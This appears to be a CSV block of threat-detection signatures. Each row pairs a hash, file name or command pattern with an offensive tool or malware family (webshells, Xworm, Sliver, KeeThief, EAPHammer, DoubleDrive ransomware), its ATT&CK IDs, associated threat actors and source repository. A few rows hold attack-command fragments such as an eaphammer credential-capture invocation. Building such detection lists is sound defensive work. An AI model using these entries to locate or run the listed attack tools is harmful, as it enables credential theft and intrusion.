"*ea743427978d01e07b5aa14268ccc59fde773633a70747659af1a80da4ed0e02*",".{0,1000}ea743427978d01e07b5aa14268ccc59fde773633a70747659af1a80da4ed0e02.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","42483"
"*ea757b0016ff6287429d657cc4197ad6cc0f2655ed21a3a9a86952a085d65be5*",".{0,1000}ea757b0016ff6287429d657cc4197ad6cc0f2655ed21a3a9a86952a085d65be5.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","42484"
"*ea800cfa42f8cd671d1569457aaf73bcc73c8ea74c4294193a69fb2bb7e1af34*",".{0,1000}ea800cfa42f8cd671d1569457aaf73bcc73c8ea74c4294193a69fb2bb7e1af34.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","42487"
"*ea8adcdf44d1dfe4f0e44d265967e1beb1ac6eaf7c0fae943a4baaf0b7d1bbdb*",".{0,1000}ea8adcdf44d1dfe4f0e44d265967e1beb1ac6eaf7c0fae943a4baaf0b7d1bbdb.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","42489"
"*ea912ca7c74d76924cdf1e634164d723a6d7a48212ab03c0f343a0132754a41b*",".{0,1000}ea912ca7c74d76924cdf1e634164d723a6d7a48212ab03c0f343a0132754a41b.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","#filehash","N/A","10","","N/A","","","","42490"
"*ea9258e9975b8925a739066221d996aef19b4ef4f4c91524f82e39d403f25579*",".{0,1000}ea9258e9975b8925a739066221d996aef19b4ef4f4c91524f82e39d403f25579.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","#filehash","N/A","10","","N/A","","","","42491"
"*EA92F1E6-3F34-48F8-8B0A-F2BBC19220EF*",".{0,1000}EA92F1E6\-3F34\-48F8\-8B0A\-F2BBC19220EF.{0,1000}","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1055 - T1059 - T1070","TA0006 - TA0005 - TA0008","N/A","EvilCorp* - APT20","Credential Access","https://github.com/GhostPack/KeeThief","1","0","#GUIDproject","N/A","10","10","944","154","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z","42493"
"*ea96ffffce62cf41ea2478b40db5e9d23f850f983cd8dcd8b752baea0478c443*",".{0,1000}ea96ffffce62cf41ea2478b40db5e9d23f850f983cd8dcd8b752baea0478c443.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","42494"
"*ea9786bf97f56c75668dc7cc037a7d5661d413741ffce35073a0f2edae5d3066*",".{0,1000}ea9786bf97f56c75668dc7cc037a7d5661d413741ffce35073a0f2edae5d3066.{0,1000}","offensive_tool_keyword","dnspot","End-to-end Encrypted DNS Tunnelling and C2 framework","T1071.004 - T1090.002 - T1573.002","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/mosajjal/dnspot","1","0","#filehash","N/A","10","10","73","16","2025-02-01T08:13:29Z","2021-09-25T08:49:43Z","42495"
"*ea99966d7bb4f887b68d5b318b01d5851e99438426b7b72c65b042a58f3e6ce1*",".{0,1000}ea99966d7bb4f887b68d5b318b01d5851e99438426b7b72c65b042a58f3e6ce1.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","42496"
"*ea9f997ffb3dd610c9848af65ed980b348c06d8ee11b7fb670d6a789f8075c5a*",".{0,1000}ea9f997ffb3dd610c9848af65ed980b348c06d8ee11b7fb670d6a789f8075c5a.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","42497"
"*ea9fbd902ce3f9a49045a213f6f18d922e6460869f908a9798466fbccaa60484*",".{0,1000}ea9fbd902ce3f9a49045a213f6f18d922e6460869f908a9798466fbccaa60484.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","42498"
"*eaa667b2ee62c5960b2a1ae23ec8edbdb89de0897960cf9f5117b721f519ae98*",".{0,1000}eaa667b2ee62c5960b2a1ae23ec8edbdb89de0897960cf9f5117b721f519ae98.{0,1000}","offensive_tool_keyword","AV_Evasion_Tool","Undetectable Payload Generator Tool","T1027 - T1036 - T1059 - T1107","TA0005","N/A","N/A","Defense Evasion","https://github.com/1y0n/AV_Evasion_Tool","1","0","#filehash","N/A","10","10","2680","406","2023-12-08T07:38:06Z","2020-04-24T01:11:09Z","42500"
"*eaa6c3fcb9e722d690183ae349ac2ca935aa9bcd2942f6f103fd8eb842dc5168*",".{0,1000}eaa6c3fcb9e722d690183ae349ac2ca935aa9bcd2942f6f103fd8eb842dc5168.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","42501"
"*eaabe990e3dfa97bc3ffdd9f7369553597fb1686dbd91e164560ee476e1d6e79*",".{0,1000}eaabe990e3dfa97bc3ffdd9f7369553597fb1686dbd91e164560ee476e1d6e79.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","42503"
"*eaae77ff59bd46d07499b29eaefb4ba3f1d1e36fe3c99ab46bb1fd578113cbe5*",".{0,1000}eaae77ff59bd46d07499b29eaefb4ba3f1d1e36fe3c99ab46bb1fd578113cbe5.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","42504"
"*eab9878a9916e998587cf5587e3ac5ce0e5509713b3afe6e64003e8c6962b565*",".{0,1000}eab9878a9916e998587cf5587e3ac5ce0e5509713b3afe6e64003e8c6962b565.{0,1000}","offensive_tool_keyword","creddump7","extracts various forms of credentials from Windows systems","T1003 - T1081 - T1040 - T1110 - T1555","TA0006 - TA0009","N/A","Sandworm","Credential Access","https://github.com/CiscoCXSecurity/creddump7","1","0","#filehash","N/A","10","4","394","106","2020-10-02T13:25:16Z","2014-06-24T13:18:38Z","42506"
"*eae0886d4156fbf4b7af942fc3e5569d7ef36147c025d06fe30a34b852b4dcfc*",".{0,1000}eae0886d4156fbf4b7af942fc3e5569d7ef36147c025d06fe30a34b852b4dcfc.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","42510"
"*eae0e50f0914e264a60f84dc2fef44c610d00125a38d70fa6f470fa45b12d1e9*",".{0,1000}eae0e50f0914e264a60f84dc2fef44c610d00125a38d70fa6f470fa45b12d1e9.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","42511"
"*eae10507ae68eb619503bf0ea16b0d7fd4a1eb5d817bde2746413fb27c1e5aa5*",".{0,1000}eae10507ae68eb619503bf0ea16b0d7fd4a1eb5d817bde2746413fb27c1e5aa5.{0,1000}","offensive_tool_keyword","ShellSync","exposing a server with suspicious scripts and executable from I-Am-Jakoby","T1059.003 - T1100  - T1027","TA0005 - TA0009 - TA0011 ","N/A","N/A","Data Exfiltration","https://github.com/I-Am-Jakoby/ShellSync","1","0","#filehash","N/A","5","1","20","7","2023-11-08T18:01:18Z","2023-11-06T06:05:11Z","42512"
"*eae7c7548d28517d099afef1bc7664f098bfa3c533ee5a0cf763ab28480ebeeb*",".{0,1000}eae7c7548d28517d099afef1bc7664f098bfa3c533ee5a0cf763ab28480ebeeb.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","42513"
"*eaf0b65b09feded70f455b4fff79bc1fd2009b927849ad4ba63228d79fc90d4e*",".{0,1000}eaf0b65b09feded70f455b4fff79bc1fd2009b927849ad4ba63228d79fc90d4e.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","42514"
"*eaf13ef05abfd1faa71d5ce0aa0b19664bdc32d05dea7836ad6d9bc0b2ff1694*",".{0,1000}eaf13ef05abfd1faa71d5ce0aa0b19664bdc32d05dea7836ad6d9bc0b2ff1694.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","42515"
"*eaf50935fba5aec83bbdf8fdc1ee57284098b88503c25fab1581d4c2b5ddb41e*",".{0,1000}eaf50935fba5aec83bbdf8fdc1ee57284098b88503c25fab1581d4c2b5ddb41e.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1068 - T1548.004 - T1611 - T1203 - T1059.004","TA0004 - TA0001 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/liamg/traitor","1","0","#linux #filehash","N/A","10","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","42516"
"*eaf85e2ba4dd79f5ef5d8d18c5886dc8cde0e18e7341e6808baf3d9a5bafed7d*",".{0,1000}eaf85e2ba4dd79f5ef5d8d18c5886dc8cde0e18e7341e6808baf3d9a5bafed7d.{0,1000}","offensive_tool_keyword","AV_Evasion_Tool","Undetectable Payload Generator Tool","T1027 - T1036 - T1059 - T1107","TA0005","N/A","N/A","Defense Evasion","https://github.com/1y0n/AV_Evasion_Tool","1","0","#filehash","N/A","10","10","2680","406","2023-12-08T07:38:06Z","2020-04-24T01:11:09Z","42517"
"*eaf950c4c33d4697237cd99ac67b9050fa2c4d90c748f5c6582872ca1b0b7ffc*",".{0,1000}eaf950c4c33d4697237cd99ac67b9050fa2c4d90c748f5c6582872ca1b0b7ffc.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","42518"
"*eaphammer -i eth0 --channel 4 --auth wpa-eap --essid * --creds*",".{0,1000}eaphammer\s\-i\seth0\s\-\-channel\s4\s\-\-auth\swpa\-eap\s\-\-essid\s.{0,1000}\s\-\-creds.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","42519"
"*eaphammer*",".{0,1000}eaphammer.{0,1000}","offensive_tool_keyword","EAPHammer","EAPHammer is a toolkit for performing targeted evil twin attacks against WPA2-Enterprise networks. It is designed to be used in full scope wireless assessments and red team engagements. As such. focus is placed on providing an easy-to-use interface that can be leveraged to execute powerful wireless attacks with minimal manual configuration. To illustrate just how fast this tool is. our Quick Start section provides an example of how to execute a credential stealing evil twin attack against a WPA/2-EAP network in just commands","T1553 - T1560 - T1569 - T1590 - T1591","TA0002 - TA0007","N/A","N/A","Exploitation tool","https://github.com/s0lst1c3/eaphammer","1","0","N/A","N/A","8","10","2299","316","2024-09-22T22:40:38Z","2017-02-04T01:03:39Z","42520"
"*eapmd5tojohn*",".{0,1000}eapmd5tojohn.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","42521"
"*earching for systems where privileged users' credentials might be in running memory*",".{0,1000}earching\sfor\ssystems\swhere\sprivileged\susers\'\scredentials\smight\sbe\sin\srunning\smemory.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","42522"
"*EarlyBird_Injection.py*",".{0,1000}EarlyBird_Injection\.py.{0,1000}","offensive_tool_keyword","Chimera","Automated DLL Sideloading Tool With EDR Evasion Capabilities","T1574 - T1574.001 - T1218 - T1218.002 - T1070 - T1070.004 - T1036 - T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/georgesotiriadis/Chimera","1","0","N/A","N/A","9","5","469","56","2023-12-19T22:58:03Z","2023-05-15T13:02:54Z","42523"
"*easinvoker.exe*System32*",".{0,1000}easinvoker\.exe.{0,1000}System32.{0,1000}","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","0","N/A","N/A","N/A","4","368","45","2023-11-02T23:52:51Z","2023-06-10T03:30:59Z","42524"
"*easside-ng -* -s 127.0.0.1*",".{0,1000}easside\-ng\s\-.{0,1000}\s\-s\s127\.0\.0\.1.{0,1000}","offensive_tool_keyword","aircrack","cracking Wi-Fi security including WEP and WPA/WPA2-PSK encryption","T1078 - T1496 - T1040","TA0006 - TA0008 - TA0005","N/A","N/A","Credential Access","https://github.com/aircrack-ng/aircrack-ng","1","0","N/A","N/A","5","10","5967","1032","2024-12-19T21:36:56Z","2018-03-10T17:11:11Z","42525"
"*EasyHook-Managed*InjectionLoader.cs*",".{0,1000}EasyHook\-Managed.{0,1000}InjectionLoader\.cs.{0,1000}","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/FuzzySecurity/Dendrobate","1","1","N/A","N/A","10","2","131","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z","42528"
"*EasyHook-Managed*WOW64Bypass.*",".{0,1000}EasyHook\-Managed.{0,1000}WOW64Bypass\..{0,1000}","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/FuzzySecurity/Dendrobate","1","1","N/A","N/A","10","2","131","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z","42529"
"*EasyHook-Managed/LocalHook.cs*",".{0,1000}EasyHook\-Managed\/LocalHook\.cs.{0,1000}","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/FuzzySecurity/Dendrobate","1","1","N/A","N/A","10","2","131","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z","42530"
"*EasyPersistent.cna*",".{0,1000}EasyPersistent\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","N/A","10","10","540","86","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z","42531"
"*eb046b68a014aded4f81bb952edadd283a0cd5a36fc416b89d391df3daaa6d9e*",".{0,1000}eb046b68a014aded4f81bb952edadd283a0cd5a36fc416b89d391df3daaa6d9e.{0,1000}","offensive_tool_keyword","PwDump8","pwdump7 works with its own filesytem driver (from rkdetector.com technology) so users with administrative privileges are able to dump directly from disk both SYSTEM and SAM registry hives. Once dumped - the SYSKEY key will be retrieved from the SYSTEM hive and then used to decrypt both LanMan and NTLM hashes and dump them in pwdump like format.","T1003.001 - T1555.003 - T1077","TA0006 - TA0008","N/A","N/A","Credential Access","https://download.openwall.net/pub/projects/john/contrib/pwdump/pwdump8-8.2.zip","1","0","#filehash","N/A","10","8","N/A","N/A","N/A","N/A","42532"
"*eb0beca1758174ab255d6a183dc645005249a70c3c77db9e9eb2b24551f21114*",".{0,1000}eb0beca1758174ab255d6a183dc645005249a70c3c77db9e9eb2b24551f21114.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","42534"
"*eb11e2e1f6611560c9822ca53a829028642a676c2d03bbf86c57e4b41fdcff9e*",".{0,1000}eb11e2e1f6611560c9822ca53a829028642a676c2d03bbf86c57e4b41fdcff9e.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","42536"
"*eb203a19993c7f3e6e02e0af12473fb59210b6699debf70c9492cd4b4335750a*",".{0,1000}eb203a19993c7f3e6e02e0af12473fb59210b6699debf70c9492cd4b4335750a.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","42539"
"*eb20a48a7db56cd444d98b7990156213272258a9b80e8f2c6a84be64f2179763*",".{0,1000}eb20a48a7db56cd444d98b7990156213272258a9b80e8f2c6a84be64f2179763.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","42540"
"*eb2bcc1bc9b6802b3869f6343b0fcbe72f3d1642abbc34e0758122e6510c2f4a*",".{0,1000}eb2bcc1bc9b6802b3869f6343b0fcbe72f3d1642abbc34e0758122e6510c2f4a.{0,1000}","offensive_tool_keyword","DoubleDrive","A fully-undetectable ransomware that utilizes OneDrive & Google Drive to encrypt target local files","T1486 - T1562.001 - T1213 - T1070.004 - T1070.006 - T1105","TA0040 - TA0009 - TA0011 - TA0005","N/A","N/A","Ransomware","https://github.com/SafeBreach-Labs/DoubleDrive","1","0","#filehash","N/A","10","2","124","14","2024-05-28T16:25:59Z","2023-05-23T13:17:38Z","42543"
"*eb3942820fe42a74498278ea17038712f1aad0e37d2ff939b71d55cfe3bf262f*",".{0,1000}eb3942820fe42a74498278ea17038712f1aad0e37d2ff939b71d55cfe3bf262f.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","0","#filehash","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","42544"
"*eb5711643823d2be13eb499c8c955c09451fc3efc9d259ff0644d17115be8cd6*",".{0,1000}eb5711643823d2be13eb499c8c955c09451fc3efc9d259ff0644d17115be8cd6.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","42547"
"*eb5fee1e402f321c8e705776faf2be7bbede5d2a24fe3ac40be082a75429f927*",".{0,1000}eb5fee1e402f321c8e705776faf2be7bbede5d2a24fe3ac40be082a75429f927.{0,1000}","offensive_tool_keyword","libprocesshider","Hide a process under Linux using the ld preloader","T1055 - T1564 - T1620","TA0005 ","N/A","Sandworm","Defense Evasion","https://github.com/gianlucaborello/libprocesshider","1","0","#filehash #linux","N/A","9","10","1061","320","2019-08-02T14:28:28Z","2014-08-16T01:09:30Z","42549"
"*eb6536b06148bb2c1a9c4103b98778d51f1204bd0aaf1b01dfb4a2c103ee000a*",".{0,1000}eb6536b06148bb2c1a9c4103b98778d51f1204bd0aaf1b01dfb4a2c103ee000a.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","42551"
